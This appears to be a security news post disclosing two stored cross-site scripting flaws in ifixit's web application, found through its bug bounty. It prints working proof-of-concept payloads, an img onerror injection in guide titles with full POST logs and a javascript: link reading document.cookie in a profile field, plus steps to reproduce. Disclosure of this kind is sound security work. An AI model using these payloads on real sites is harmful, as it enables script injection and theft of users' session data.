ifixit Bug Bounty Program 2016 Q1 - Multiple Vulnerabilities disclosed by Core Researcher
ifixit Bug Bounty Program 2016 Q1 - Multiple Vulnerabilities disclosed by Core Researcher
In the last 3 weeks the vulnerability researcher and core team member "hadji samir" discovered several valid bugs to the official ifixit company. The issue was disclosed in the online service web-application of the ifixit company.
The first vulnerability was located in the `title name` value of the `guides` and `prerequisite guides` search modules. Remote attackers with low privileged web-application user accounts are able to inject own malicious script codes to the application-side of the affected POST/GET method request. The attack vector of the vulnerability is located on the application-side and the request method to inject is POST. The execution of the inserted payload occurs in the search module were the `guides` and `prerequisite guides` becomes available with keyword.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] guides
[+] prerequisite guides
Vulnerable Parameter(s):
[+] title name (Guide)
Affected Module(s):
[+] Search Guide
PoC: Exploitcode
<div class="prereqBody">
<i class="fa fa-minus-circle delete"></i>
<span class="prereqName">Samir"><img src="c" onerror=alert(document.domain)></span>
</div>
--- PoC Session Logs [POST] ---
Status: 201[Created]
POST https://www.ifixit.com/api/2.0/guides
Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Content Size[2192] Mime Type[application/json]
Request Headers:
Host[www.ifixit.com]
User-Agent[Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:44.0) Gecko/20100101 Firefox/44.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
X-Requested-With[XMLHttpRequest]
X-HTTP-Method-Override[POST]
X-CSRF[5vq44aqiks]
X-ALLOW-HTTP[true]
Api-Client[iFixit-Web]
Content-Type[application/x-www-form-urlencoded; charset=utf-8]
Referer[https://www.ifixit.com/Guide/new]
Content-Length[312]
Cookie[_ga=
Connection[keep-alive]
Post Data:
{"type":"replacement","category":"test","subject":"test","title":"Samir\"><img src=\"c\" onerror=alert(document.domain)> Replacement","summary":"test","introduction":"","flags":[],"image":null,"langid":"en"}]
Response Headers:
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
x-content-type-options[nosniff]
X-Max-Age[30m]
Content-Type[application/json]
Content-Length[2192]
Accept-Ranges[bytes]
Date[Mon, 01 Feb 2016 13:52:16 GMT]
X-Varnish[166966529]
Age[0]
X-Debug-Deliver[True]
X-Debug-Cache[MISS]
The second vulnerability was located in the additional information input field of the `my profile > about me` web-application module. Remote attackers with low privileged web-application user accounts are able to inject own script codes to the application-side of the vulnerable modules context. The attack vector is located on the application-side and the request method to inject is POST.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] my profile > about me
Vulnerable Input(s):
[+] additional information
Affected Module(s):
[+] my profile
Manual steps to reproduce the vulnerability ...
1. Open my profile > About me > Additional Information
2. Write in the Additional Information input field your own script code payload
3. Save the entry
4. revisit the my profile page
5. Successful reproduce of the vulnerability!
PoC:
[image|100|caption=<click here >|link=javascript:alert(document.cookie)]
Finally both issues are patched by the manufacturer. The core team researcher received a nice "lock picking gift" next to the regular bug bounty reward by the ifixit company. The third issue is not public yet but we keep you updated!
Advisories:
http://www.vulnerability-lab.com/get_content.php?id=1700
http://www.vulnerability-lab.com/get_content.php?id=1701
http://www.vulnerability-lab.com/get_content.php?id=1675
Today's Most Popular
All Time Most Popular
Most Commented Articles
Top Rated Articles
Recent comments
Syndicate
Add new comment